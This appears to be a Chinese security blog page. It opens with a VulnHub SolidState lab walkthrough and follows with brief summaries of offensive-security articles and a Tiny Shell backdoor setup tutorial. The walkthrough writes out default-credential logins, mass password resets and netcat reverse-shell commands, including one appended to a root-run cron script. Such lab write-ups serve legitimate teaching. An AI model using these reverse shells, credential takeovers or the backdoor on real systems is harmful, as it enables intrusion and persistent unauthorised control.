歡迎光臨
我們一直在努力

Vulnhub x SolidState: 1

波波閱讀(1691)

VulnHub是一個面向所有人開放的安全靶場,裡面有很多安全環境,只要下載相關映像檔,在相關虛擬機器上面執行就可以練習相關靶場了。裡面設計了好多關,如果有耐心一定可以到達峰頂。許多考OSCP人員,也會利用Vulnhub靶場進行刷題。我們下載了一個經典漏洞靶場,給大家進行演示,希望讓初學者知道滲透測試的套路,可以更快的成長。

靶機:SolidState: 1

首先,先查詢自己本地的IP,可以透過 ifconfig查詢。

eth0 192.168.44.136 這是本地IP ,同時也是攻擊者端

接著我們透過 nmap這款工具,可以快速系統掃描,並查找當前內網的其他主機及服務。

nmap -A 192.168.44.0/24 ,查詢該網段底下的主機,發現標的物為 192.168.44.137 主機。

接著透過 nmap 掃描該標的物主機使用了哪些服務,可以透過nmap 192.168.44.137 -sV -p 0-65535

掃描 0-65535 Port中,使用哪些。

發現該主機開啟了 22、25、80、110、119、4555 Port,並且STATE狀態都為 open。

而後面Version為該服務版本號,我們可以將蒐集到的資訊,一一作為查詢是否存在漏洞,

例:james-admin JAMES Remote Admin 2.3.2,透過exploit-db可以找到這篇RCE漏洞

在滲透測試過程中,前期一定要先做好情報蒐集,例如該網站/主機提供了什麼樣的服務/功能 ? 使用什麼語言開發? 哪些框架? 版本號? 子目錄? 子域名? 等

除了nmap對主機進行探測外,我們還可以嘗試對網站進行掃描下,

使用Dirb,該工具是使用字典檔來進行網站探測目錄,是個很方便的工具

在現實生活中,很多網站可以透過robots.txt、/.git /.svn等方式來尋找網站的敏感資訊,甚至是網站後台、原始碼等

這邊只有 images目錄、index.html,沒什麼資訊可利用。

於是直接訪問網站,查看下提供了哪些功能 ? 可能存在什麼漏洞 ? 例:XSS、SQL Injection等

網站逛過一遍後,發現基本上都是html,沒什麼可輸入、可互動的功能,唯獨只有看到這個像是Email聯繫的功能。

在這邊一開始以為有沒有可能是要透過 XSS來拿 admin的資料,但嘗試了下 看起來不是。

既然網站感覺沒有功能可以打,也沒蒐集到可利用的資訊,於是我們轉移目標,放到一開始nmap所掃描的服務上。

將每個服務都Google查詢一遍後,發現James Server 2.3.2存在漏洞,於是我們就往這個點打。

首先 nc 連到該主機標的,帳號密碼嘗試用弱密碼/預設密碼猜測,例:root/root,admin/admin 等。

root 成功登入後,下指令help查詢下,看看提供什麼指令可以操作。

發現listusers,看起來是 列出使用者,adduser為添加使用者,setpassword為重設密碼

透過listusers,可以看到有 james、thomas、john、mindy、mailadmin用戶。

../../../../../../../../etc/bash_completion.d 是我在練習時,透過exploit 添加上去的,這邊可以暫時先忽略。

有了使用者帳號後,但因為不知道使用者密碼,於是可以透過setpassword來更改密碼,

setpassword mindy lonelypopo

依序將每位使用者密碼都暫時修改為 lonelypopo,方便之後可以利用。

修改完密碼後,接著嘗試連接 pop3服務

telnet 192.168.44.137 110

也是依序將每位使用者都登入看看,然後查詢/蒐集下有什麼機敏資料。

最後在mindy使用者上 查詢retr 2後發現該標的主機的ssh帳號密碼。

你問我為什麼知道是ssh的帳號密碼? 原因很簡單,將蒐集到的資訊,每個服務都嘗試登入看看就知道了。

Username:mindy

Password:[email protected][email protected]

接著就可以直接ssh [email protected] 登入該標的主機了。

在當前目錄下 ls ,發現有 第一關 user.txt的 flag,於是直接 cat user.txt。

拿到第一把flag。

不過由於mindy不是root權限,無法訪問/root目錄,也無法查看root.txt,所以接下來的步驟得想辦法提權到root。

接下來,我們使用前面提到的Exploit並修改下Payload,

原:payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root

改:payload = 'nc -e /bin/sh 192.168.44.136 8000' # to exploit only on root

就是要Reverse Shell,反彈回來到本地上,之後比較方便操作。

然後在Kali 本地上 透過nc 監聽 8000 port,當執行exploit後,在ssh到該標的主機上,shell就會反連回來了。

視窗一 python exp.py 192.168.44.137

視窗二 ssh [email protected]

視窗三 nc -lvp 8000

反彈回來後,習慣切換到交互式操作視窗,比較方便操作。

python -c 'import pty;pty.spawn("/bin/bash")'

因為要想辦法提升到root權限來讀取root.txt,所以當打下主機後(低權限),就是要開始蒐集資訊,查看主機內的哪些process是透過root執行,哪些服務是root權限等等之類的。

可以使用ps aux來查看

而經過一番查詢後,ps aux | grep james

看到/opt目錄下 james-2.3.2,感覺就是可以打的點。

在/opt目錄下 透過 ls -al,可以查看到有 james-2.3.2 及 tmp.py

可以查看下 tmp.py裡邊的程式碼,看看能不能修改。

rm -r /tmp/* ,刪除/tmp底下的檔案,於是我們到/tmp底下,隨便新增一個目錄,然後執行tmp.py,查看是否可以成功執行。

因為shell壞掉,無法直接vi修改,但發現可以透過echo方式來添加進去

echo "os.system('/bin/nc -e /bin/bash 192.168.44.137 8082')" >> tmp.py

接著 nc -vlnp 8082 ,透過nc 監聽8082 Port,等待Shell反連回來。

剛才透過echo寫入 tmp.py後,我們可以直接 cat tmp.py 讀取tmp,這時候shell就會成功反連回來了。

成功反彈shell後,透過id查看下當前用戶是 root,於是成功提權了。

cat root.txt,讀取第二把flag。

結束。

 

利用INF Script下載執行技術來進行繞過,免殺和持久化

波波閱讀(1273)

原文地址:https://www.freebuf.com/column/164986.html

通過對MSDN上一些處理不同COM指令碼的調查和測試,結合網上的分享,我發現了一些有意思的東西,這些發現可能是遠端呼叫執行指令碼新方法。
其中最有意思的是LaunchINFSection。

這篇文章主要討論一下網上公開的利用INF Script的方法,並介紹下LaunchINFSection,最後再分享一些用法和作為防禦者應該注意的事項。另外,還會給出一些其他遠端執行指令碼方法的參考。

前言引用來源:https://www.freebuf.com/column/164986.html
文章圖片來源:https://www.freebuf.com/column/164986.html

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

Exchange CVE-2018-8581 補丁有用?沒用?

波波閱讀(981)

原文地址:https://mp.weixin.qq.com/s?__biz=MzI5Nzc0OTkxOQ==&mid=2247483837&idx=1&sn=34d3f9eb803f09a45586882f0c6c16e1

CVE-2018-8581 TL;DR

漏洞最早由 ZDI 披露,ZDI 發現的 PoC 裡面利用此漏洞實現了接管任意人的收件箱的效果。

原理比較簡單,該漏洞實質是由 SSRF (Server-Side Request Forgery:伺服器端請求偽造)漏洞和其他安全機制相結合造成的。Exchange 允許任何使用者為推送訂閱指定所需的 URL,伺服器將嘗試向這個 URL 傳送通知,此行為造成 SSRF 漏洞。且 Exchange 伺服器在向指定的 URL 傳送通知時,在需要的情況下Exchange 會自動向此 URL 進行 401 身份認證。認證的其中一種方式為NTLM 認證。且因為 Exchange 服務在與目標 URL 進行 401 認證時所使用的預設憑據為 CredentialCache.DefaultCredentials 且相關 Exchange 服務由 SYSTEM 賬號或 NETWORK SERVICE 賬號啟動, 所以攻擊者通過利用此 SSRF 漏洞,可以竊取 Exchange 伺服器的系統賬號憑據並伴隨利用 NTLM-RELAY 技術將此憑據重放至 Exchange 伺服器的 EWS 介面,從而獲得一個高許可權的 EWS 會話(所以此漏洞在微軟官方的通告裡面被描述為 ”Microsoft Exchange Server Elevation of Privilege Vulnerability“)。該高許可權的會話允許攻擊者在後續訪問 EWS 介面時模擬成任何使用者,並最終可以接收到任何使用者今後所接收到的任何郵件。

前言引用來源:https://mp.weixin.qq.com/s?__biz=MzI5Nzc0OTkxOQ==&mid=2247483837&idx=1&sn=34d3f9eb803f09a45586882f0c6c16e1
文章圖片來源:http://www.micromail.com/microsoft-exchange-server-2013/ms0001pd.html

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

RDP蜜罐:中間人技術的實踐

波波閱讀(1113)

原文地址:https://nosec.org/home/detail/2093.html

在這篇文章中,作者將展示最新開發的開源項目PyRDP(https://github.com/gosecure/pyrdp),它既可以當作MITM,也可以用作研究RDP協議的程式碼庫之一。作者將通過描述蜜罐所捕獲的惡意使用者的惡意行為來演示以下兩個用例。

前言引用來源:https://nosec.org/home/detail/2093.html
文章圖片來源:https://nosec.org/home/detail/2093.html

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

無需sendmail:巧用LD_PRELOAD突破disable_functions

波波閱讀(1491)

原文地址:https://www.freebuf.com/articles/web/192052.html

摘要:千辛萬苦拿到的 webshell 居然無法執行系統命令,懷疑服務端 disable_functions 禁用了命令執行函數,通過環境變數 LD_PRELOAD 劫持系統函數,卻又發現目標根本沒安裝 sendmail,無法執行命令的 webshell 是無意義的,看作者如何突破!

前言引用來源:https://www.freebuf.com/articles/web/192052.html
文章圖片來源:https://www.freebuf.com/articles/web/192052.html

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

Payloads All The Things

波波閱讀(1097)

原文地址:https://github.com/swisskyrepo/PayloadsAllTheThings

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

前言引用來源:https://github.com/swisskyrepo/PayloadsAllTheThings
文章圖片來源:https://github.com/swisskyrepo/PayloadsAllTheThings

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

內網滲透常見端口轉發方式

波波閱讀(1189)

原文地址:https://payloads.online/archivers/2018-02-02/1

由於在內網滲透的過程中面對的網路環境都是千奇百怪的,我們需要探測連線情況。

需要使用到端口轉發技術來讓我們訪問到內網其他主機中,或者將內網中某個端口轉發到本地。

端口對映 : 端口對映是將一臺主機的內網(LAN)IP地址對映成一個公網(WAN)IP地址,當用戶訪問提供對映端口主機的某個端口時,伺服器將請求轉移到本地區域網內部提供這種特定服務的主機;

前言引用來源:https://payloads.online/archivers/2018-02-02/1
文章圖片來源:https://payloads.online/archivers/2018-02-02/1

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

徹底理解Windows認證 - 議題解讀

波波閱讀(1089)

原文地址:https://payloads.online/archivers/2018-11-30/1

本次議題圍繞著Windows認證分別講解了:

Pass The Hash
Silver Tickets、Golden Tickets、
Impersonation Token
這些技術分別能夠滿足我們在滲透中持續的維持許可權、提權。

前言引用來源:https://payloads.online/archivers/2018-11-30/1
文章圖片來源:https://payloads.online/archivers/2018-11-30/1

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

隧道技術之DNS和ICMP與其檢測防禦

波波閱讀(1132)

原文出處:https://www.anquanke.com/post/id/163240

簡述
為了逃避監測,繞過殺軟,更好的隱藏自身,很多木馬的傳輸層都使用了隧道技術,那什麼是隧道技術(我是誰)?其傳輸有什麼特點(我從哪裡來)?隧道技術的現狀是怎樣的呢(我到那裡去)?連問三連擊:)

隧道技術(Tunneling):是一種通過使用網際網路絡的基礎設施在網路之間傳遞資料的方式,使用隧道傳遞的Data(資料)或 Payload (負載)可以是不同協議的資料幀或包。隧道協議將其它協議的資料幀或包,重新封裝然後通過隧道傳送,新的幀頭,提供路由資訊,以便通過網際網路傳遞被封裝的 Payload。

資料傳輸特點(Feature):不通過網路直接傳送資料包,通過封裝技術在另一個(通常是加密的)連線中傳送資料。

現狀:傳統socket隧道已極少,TCP、UDP 大量被防禦系統攔截,DNS、ICMP、http/https 等難於禁止的協議已成為黑客控制隧道的主流。

上面我們瞭解了隧道技術,不知你是否會好奇 DNS 隧道為什麼會有那麼強大?一方面是因為 DNS 報文具有天然的穿透防火牆的能力;另一方面,目前的防毒軟體、IDS 等安全策略很少對 DNS 報文進行有效的監控管理:)接下來我們來回顧下這樣幾個典型的攻擊事件中用到的隧道木馬的特點。

文章圖片來源:https://www.anquanke.com/post/id/163240
前言引用來源:https://www.anquanke.com/post/id/163240

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

Tiny Shell後門紀錄與教學

波波閱讀(2131)

Tiny Shell 是一款開源的Unix類後門shell工具,由C語言編寫,體積小(在kali系統上編譯後只有55K大小)。
分為客戶端和服務端,支援正向連線模式(即服務端在遠端執行,使用者遠端直接連結),和反彈連線模式(使用者在自己伺服器監聽,服務端連結監聽埠)

功能:
通訊加密
支援上傳、下載、直接反彈shell

系統環境 CentOS 7
安裝 gcc & make
用 YUM 安裝 “Development Tools” 就會自動安裝所有需要的套件。
#yum group install "Development Tools"

安裝gcc編譯器 (可以編譯C程式) #yum install gcc
安裝g++ (安裝後才可以編譯C++程式) #yum install gcc-c++
安裝make命令#yum install make
安裝wget命令 #yum install wget

#git clone https://github.com/orangetw/tsh.git
#cd tsh
編輯tsh.h檔案
#vi tsh.h

更改密碼&Port等,詳細參考 短小精干的Unix类后门Tiny shell的使用与分析

更改完畢後,make linux,會產生tsh會tshd兩個檔案。
在受害者端 放上tshd檔案,並賦予權限後執行
#chmod +x tshd & #./tshd
在主控端賦予tsh檔案權限後執行
#chmod +x tsh & #./tsh 受害者端IP

CentOS 7 安裝gcc教學:https://www.phpini.com/linux/rhel-centos-linux-install-gcc

CentOS 7 安裝make教學:https://my.oschina.net/u/1028135/blog/515889

Tiny Shell教學介紹:https://www.freebuf.com/sectool/138350.html

Tiny Shell:https://github.com/orangetw/tsh

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

波波的寂寞世界

Facebook聯繫我們